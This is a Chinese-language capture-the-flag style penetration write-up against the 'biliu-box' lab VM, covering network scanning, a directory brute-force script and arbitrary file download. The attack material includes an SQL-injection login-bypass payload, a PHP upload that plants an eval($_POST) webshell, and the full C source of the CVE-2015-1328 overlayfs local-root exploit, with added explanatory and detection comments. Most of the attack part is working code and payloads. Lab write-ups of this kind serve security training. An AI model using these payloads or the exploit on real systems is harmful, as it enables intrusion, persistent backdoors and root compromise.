针对“biliu-box“ 靶机的 渗透记录

此教程不适合新手小白,你要是说只想知道怎么打通这个靶机那当我没说,个中原理,自行理解。

环境:
靶机在内网,不知道IP,只知道C段。

1.首先扫描存活ip

nmap -sn 192.168.206.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 08:08 EDT
Nmap scan report for 192.168.206.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.206.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:E5:40:BD (VMware)
Nmap scan report for 192.168.206.132
Host is up (0.0016s latency).
MAC Address: 00:0C:29:31:59:3D (VMware)
Nmap scan report for 192.168.206.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E3:95:07 (VMware)
Nmap scan report for 192.168.206.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.17 seconds
明显看到这台机子的IP是 192.168.206.132,因为 .129 是我的扫描机。
扫描端口:
nmap  192.168.206.132 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 08:16 EDT
Nmap scan report for 192.168.206.132
Host is up (0.000060s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:31:59:3D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
开了80 和22 端口

2.利用御剑扫描后台:

 打开这个页面

上面几个页面看起来都很有诱惑力add.php更是让人浮想联翩 以为是什么在数据库增加数据的页面,但是实则,上述页面都没啥用唯独这个test.php是有用的

http://192.168.206.132/test.php

打开会报错,报一个没有file参数的错;然后传参发现他会把这些文件名下载下来,并且不做过滤,任何文件都可以~如果有牛逼的大佬在这里就能够完成渗透了,我只是个小学生所以继续往下做

先把他index.php下载下来看看源码:

他的主页上就写着 让我看看你的sql注入技术 这就是个提示 再看源码 这就过滤了个 ' 把 ' 给替换成空

payload:

un=or 1=1 %23&ps=1\&login=let%27s+login

成功绕过登录

其实到了这里看到上传文件,就可以尝试上传木马了,但是,偶然又获得个字典,遂利用python3 简单扫描一下

import  requests
# Wordlist-driven path check: each line of main.txt is appended to the target
# base URL and fetched, and only URLs answering HTTP 200 are printed.
# Note: requests.get is called without a timeout, so a non-responding host
# blocks the loop indefinitely. From the server side this is noisy — one
# request per wordlist entry, almost all of them 404s in the access log.
with open('main.txt','r',encoding='utf-8')as f:
    domlist=f.readlines()
for i in domlist:
    i=i.strip()  # drop the newline kept by readlines()
    i=f'http://192.168.206.132/{i}'
    s=requests.get(i)
    if s.status_code==200 :
        print(i)

 访问phpmy是phpmyadmin的页面 ,账号密码在之前御剑扫出来的c.php里面就有写 直接下载下来就好了

综上,现在可以绕过后台直接登陆,并且有数据库操作权限,到这一步可以试试写webshell,但是我做的时候,没这么搞

然后继续下载config.inc.php

 发现mysql root账号 ,但是无法通过phpmyadmin登陆

那这个就先放这里吧。

3.回到主页看文件包含部分和上传部分

先看文件包含的部分:他只判断了按没按 continue 这个按钮,然后你输入啥就包含啥了。

文件上传的部分:

包含部分理清楚了 上传图片马就好,简单说下逻辑:
判断全局变量 $_FILES['image'] 和 $_FILES['name'] 是否为空;判断 file 类型的方式就是看后缀:jpeg、png、gif、png,后缀是这几个就能上传成功,否则他就会告诉你:
i told you dear......

 构造包:

上传成功:

再利用文件包含:

但是因为这个是POST文件包含图片马,所以菜刀和蚁剑都连不到;然后我换了个思路:先看了看路径,然后写个写入木马的PHP文件重新上传:

此处路径来自刚刚上传的文件,然后执行命令 pwd 和 ls 看到的;上传新的小马,成功:

GIF89A
<?php fwrite(fopen("/var/www/uploaded_images/shell.php", "w"),'<?php @eval($_POST[1]);?>');?>

蚁剑  冰蝎 链接成功:

利用蚁剑传冰蝎木马  不传也行无所谓  webshell只要拿到就行

但是数据库依然连不上,显示的是没有权限;然后mysql的配置文件我还没权限去看

所以下一步就是提权

4.提权

查看内核版本:

Ubuntu 12.04.5 去找对应exp

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit (exploit-db.com)

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

/*
 * Source text of the helper shared library that main() writes to
 * /tmp/ofs-lib.c and compiles.  It defines getuid(): it resolves the real
 * getuid via dlsym, reads /proc/self/exe, and only when the process is
 * /bin/su running with euid 0 does it unlink /etc/ld.so.preload and
 * /tmp/ofs-lib.so, set uid/gid to 0 and exec /bin/sh -i; otherwise it just
 * forwards to the real getuid.  The library is only loaded because the
 * child below gets a writable /etc/ld.so.preload.
 * Defensive note: creation of, or a write to, /etc/ld.so.preload on a host
 * that does not use it is a strong compromise indicator worth alerting on.
 */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

/* 1 MiB stack for the clone()d child; main() passes the top of this array. */
static char child_stack[1024*1024];

/*
 * Entry point of the clone()d child that runs in the new user namespace and
 * new mount namespace set up by main().  It performs two overlayfs mounts
 * under /tmp/ns_sploit/o:
 *   mount #1: lowerdir is a read-only kernel directory (/proc/sys/kernel, or
 *             /sys/kernel/security/apparmor on newer kernels), upperdir is
 *             /tmp/ns_sploit/upper; an existing lower file is renamed to
 *             ld.so.preload inside the mount.
 *   mount #2: lowerdir is that upper directory, upperdir is /etc; the renamed
 *             file is then chmod'ed 0777 through the mount.
 * main() afterwards expects /etc/ld.so.preload to exist and be writable —
 * the overlayfs permission-handling flaw of CVE-2015-1328 named in the
 * header.  Mitigation is the kernel fix for that CVE; restricting
 * unprivileged user namespaces removes the precondition main() relies on.
 *
 * Correctness notes: the function is declared int (clone() uses the return
 * value as the child's exit status) but never returns a value, which is
 * undefined behaviour; the caller ignores the status anyway.  None of the
 * mkdir/chdir/rename/chmod/umount results are checked, and exit(-1) yields
 * an exit status of 255.
 */
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    /* The lower file chosen above depends on which mount variant succeeded. */
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    /* Mode change goes through the mount whose upperdir is /etc. */
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

/*
 * Orchestrates the CVE-2015-1328 proof of concept from the header:
 *   1. fork a wrapper that calls unshare(CLONE_NEWUSER) (failure only prints
 *      a message and continues), then fork again and clone() child_exec into
 *      a new mount namespace (CLONE_NEWNS | SIGCHLD).
 *   2. the parent sleeps 300 ms, waits for the wrapper, and treats a
 *      successful open() of /etc/ld.so.preload as the sign the child worked.
 *   3. write LIB to /tmp/ofs-lib.c, compile it with gcc via system(), append
 *      the library path to ld.so.preload, clean up, and exec /bin/su so the
 *      library's getuid() override runs (it checks for /bin/su with euid 0).
 * argc/argv are unused.  If execl() fails, control falls off the end of
 * main, which is an implicit return 0 in C99 and later.
 *
 * Detection notes for defenders: a new or modified /etc/ld.so.preload, the
 * /tmp/ns_sploit tree and /tmp/ofs-lib.{c,so}, gcc spawned by a service
 * account, and su invoked from a web-server context are all observable here.
 */
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            /* Stack grows down, so the end of child_stack is passed. */
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    /* Opened without O_TRUNC; failure here means the child did not succeed. */
    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    /* `lib` holds the source file descriptor first, then gcc's exit status. */
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    /* 16 == strlen("/tmp/ofs-lib.so\n"); the write() result is not checked. */
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
            

放在upload目录下或者 直接放在 /tmp 目录下 给权限编译执行就好了
